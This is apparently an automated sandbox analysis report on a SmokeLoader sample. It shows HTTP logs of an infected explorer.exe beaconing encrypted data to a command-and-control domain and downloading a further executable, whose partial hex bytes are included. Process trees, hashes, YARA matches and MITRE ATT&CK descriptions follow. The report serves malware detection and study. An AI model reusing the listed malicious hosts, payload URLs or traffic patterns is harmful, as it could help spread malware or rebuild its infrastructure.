Nov 25, 2021 18:24:50.288214922 CET	2	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kwcurllpj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 356 Host: xacokuo80.top
Nov 25, 2021 18:24:50.428165913 CET	3	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 25 Nov 2021 17:24:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 2f ae 59 4a c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj/YJUg%EQAc}yc0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49716	212.192.241.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 18:24:50.799880028 CET	4	OUT	GET /downloads/toolspab2.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: privacytoolzfor-you7000.top
Nov 25, 2021 18:24:50.919018984 CET	5	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Thu, 25 Nov 2021 17:24:50 GMT Content-Type: application/x-msdos-program Content-Length: 302592 Connection: close Last-Modified: Thu, 25 Nov 2021 17:24:01 GMT ETag: "49e00-5d1a03d96f132" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b0 b4 92 23 f4 d5 fc 70 f4 d5 fc 70 f4 d5 fc 70 9b a3 57 70 dd d5 fc 70 9b a3 62 70 e5 d5 fc 70 9b a3 56 70 97 d5 fc 70 fd ad 6f 70 ff d5 fc 70 f4 d5 fd 70 03 d5 fc 70 9b a3 53 70 f5 d5 fc 70 9b a3 66 70 f5 d5 fc 70 9b a3 61 70 f5 d5 fc 70 52 69 63 68 f4 d5 fc 70 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2a 7d 9d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 b4 7c 01 00 00 00 00 20 7c 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 80 01 00 04 00 00 6b 2c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 fe 02 00 78 00 00 00 00 70 7e 01 f8 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7e 01 d4 17 00 00 20 14 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 41 7b 01 00 20 03 00 00 14 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 67 00 00 00 70 7e 01 00 68 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 14 01 00 00 e0 7e 01 00 16 01 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 12 03 00 00 00 00 00 a6 12 03 00 00 00 00 00 70 03 03 00 8e 03 03 00 9c 03 03 00 a8 03 03 00 ba 03 03 00 da 03 03 00 ee 03 03 00 04 04 03 00 16 04 03 00 2c Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#pppWppbppVppoppppSppfppappRichpPEL*}_\| \| @k,xp~g~ Hz@.text( `.dataA{ @.rsrcgp~h @@.reloc~@Bp,

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49717	212.192.241.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 18:24:57.333904028 CET	322	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tpjfndspxp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 306 Host: xacokuo80.top
Nov 25, 2021 18:24:59.157474995 CET	323	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tpjfndspxp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 306 Host: xacokuo80.top Data Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j\|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
Nov 25, 2021 18:25:02.445750952 CET	324	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tpjfndspxp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 306 Host: xacokuo80.top Data Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j\|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
Nov 25, 2021 18:25:02.829710007 CET	324	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 25 Nov 2021 17:25:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 78 61 63 6f 6b 75 6f 38 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at xacokuo80.top Port 80</address></body></html>0

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: qhQ6armJ25.exe PID: 7112 Parent PID: 4240

General

Start time:	18:23:59
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\qhQ6armJ25.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\qhQ6armJ25.exe"
Imagebase:	0x400000
File size:	304128 bytes
MD5 hash:	9953ACB0FEE6C45FC5AA12D21AC3AD1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: qhQ6armJ25.exe PID: 7144 Parent PID: 7112

General

Start time:	18:24:07
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\qhQ6armJ25.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\qhQ6armJ25.exe"
Imagebase:	0x400000
File size:	304128 bytes
MD5 hash:	9953ACB0FEE6C45FC5AA12D21AC3AD1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: explorer.exe PID: 3424 Parent PID: 7144

General

Start time:	18:24:14
Start date:	25/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: gahfeaj PID: 5032 Parent PID: 968

General

Start time:	18:24:50
Start date:	25/11/2021
Path:	C:\Users\user\AppData\Roaming\gahfeaj
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\gahfeaj
Imagebase:	0x400000
File size:	304128 bytes
MD5 hash:	9953ACB0FEE6C45FC5AA12D21AC3AD1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: D380.exe PID: 6328 Parent PID: 3424

General

Start time:	18:24:55
Start date:	25/11/2021
Path:	C:\Users\user\AppData\Local\Temp\D380.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\D380.exe
Imagebase:	0x400000
File size:	302592 bytes
MD5 hash:	61BA8F1EDCD03481D6447E8EC34DC383
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: gahfeaj PID: 6344 Parent PID: 5032

General

Start time:	18:25:02
Start date:	25/11/2021
Path:	C:\Users\user\AppData\Roaming\gahfeaj
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\gahfeaj
Imagebase:	0x400000
File size:	304128 bytes
MD5 hash:	9953ACB0FEE6C45FC5AA12D21AC3AD1B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: D380.exe PID: 5456 Parent PID: 6328

General

Start time:	18:25:03
Start date:	25/11/2021
Path:	C:\Users\user\AppData\Local\Temp\D380.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\D380.exe
Imagebase:	0x400000
File size:	302592 bytes
MD5 hash:	61BA8F1EDCD03481D6447E8EC34DC383
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report qhQ6armJ25.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: SmokeLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets